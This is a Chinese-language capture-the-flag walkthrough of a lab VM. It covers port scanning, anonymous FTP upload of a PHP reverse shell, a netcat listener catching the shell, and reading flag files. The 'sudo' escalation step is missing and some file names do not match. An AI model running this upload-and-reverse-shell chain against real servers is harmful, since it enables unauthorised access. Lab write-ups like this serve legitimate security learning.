渗透学习

1.扫描端口服务:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root㉿kali)-[/home/ace]
└─# nmap -sC -sV -p- 192.168.56.131
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-25 14:00 CST
Nmap scan report for 192.168.56.131
Host is up (0.00048s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT    STATE SERVICE    VERSION
21/tcp  open  ftp        ProFTPD
|_ftp-bounce: bounce working!
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--   1 root     root        10725 Feb 23 15:26 index.html
25/tcp  open  tcpwrapped
|_smtp-commands: Couldn't establish connection on port 25
80/tcp  open  http       Apache httpd 2.4.54 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.54 (Debian)
110/tcp open  tcpwrapped

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 144.87 seconds

2.80开放,访问网页:

image-20230725140642556

只是初始界面:

3.经过探查:可以考虑上传getshell.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(root㉿kali)-[/home/ace]
└─# dirsearch -u http://192.168.56.131/    

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                  
 (_||| _) (/_(_|| (_| )                                                                                                                           
                                                                                                                                                  
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.168.56.131/-_23-07-25_14-18-04.txt

Error Log: /root/.dirsearch/logs/errors-23-07-25_14-18-04.log

Target: http://192.168.56.131/

[14:18:04] Starting: 
[14:18:05] 403 -  279B  - /.ht_wsr.txt                                     
[14:18:05] 403 -  279B  - /.htaccess.bak1                                  
[14:18:05] 403 -  279B  - /.htaccess.orig                                  
[14:18:05] 403 -  279B  - /.htaccess.save
[14:18:05] 403 -  279B  - /.htaccess_orig
[14:18:05] 403 -  279B  - /.htaccess_extra
[14:18:05] 403 -  279B  - /.htaccess.sample
[14:18:05] 403 -  279B  - /.htaccess_sc
[14:18:05] 403 -  279B  - /.htaccessOLD
[14:18:05] 403 -  279B  - /.htaccessOLD2
[14:18:05] 403 -  279B  - /.htaccessBAK
[14:18:05] 403 -  279B  - /.html
[14:18:05] 403 -  279B  - /.htm                                            
[14:18:05] 403 -  279B  - /.htpasswd_test
[14:18:05] 403 -  279B  - /.httr-oauth                                     
[14:18:05] 403 -  279B  - /.htpasswds
[14:18:06] 403 -  279B  - /.php                                            
[14:18:29] 200 -   10KB - /index.html                                       
[14:18:41] 403 -  279B  - /server-status                                    
[14:18:41] 403 -  279B  - /server-status/

ftp上传一下:

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kali)-[/usr/share/laudanum/php]
└─# ftp 192.168.56.131
Connected to 192.168.56.131.
220 ProFTPD Server (friendly) [::ffff:192.168.56.131]
Name (192.168.56.131:ace): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

上传shell:

1
2
3
4
5
6
7
8
ftp> put rece.php
local: rece.php remote: rece.php
229 Entering Extended Passive Mode (|||57118|)
150 Opening BINARY mode data connection for rece.php
100% |*****************************************************************************************************|  5496       21.74 MiB/s    00:00 ETA
226 Transfer complete
5496 bytes sent in 00:00 (2.16 MiB/s)
ftp>

现在我们只需听 Netcat 并运行反向 shell。为此,我们在 nc -nlvp 1234 面板中输入并在另一个 curl http://$ip/rev.php 中输入(或直接从浏览器加载 URL):

反弹成功:

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kali)-[/home/ace]
└─# nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.56.127] from (UNKNOWN) [192.168.56.131] 54870
Linux friendly 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64 GNU/Linux
 02:40:36 up 41 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

得到user.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/bin/sh: 0: can't access tty; job control turned off
$ pwd
/
$ cd home
$ ls
RiJaba1
$ cd RiJaba1
$ ls
CTF
Private
YouTube
user.txt
$ cat user.txt
b8cff8c9008e1c98a1f2937b4475acd6
$

4.sudo提权:

1
2
3
4
5
6
7
8
find /-name root.txt
find: '/-name': No such file or directory
root.txt
find / -name root.txt
/var/log/apache2/root.txt
/root/root.txt
cat /var/log/apache2/root.txt
66b5c58f3e83aff307441714d3e28d2f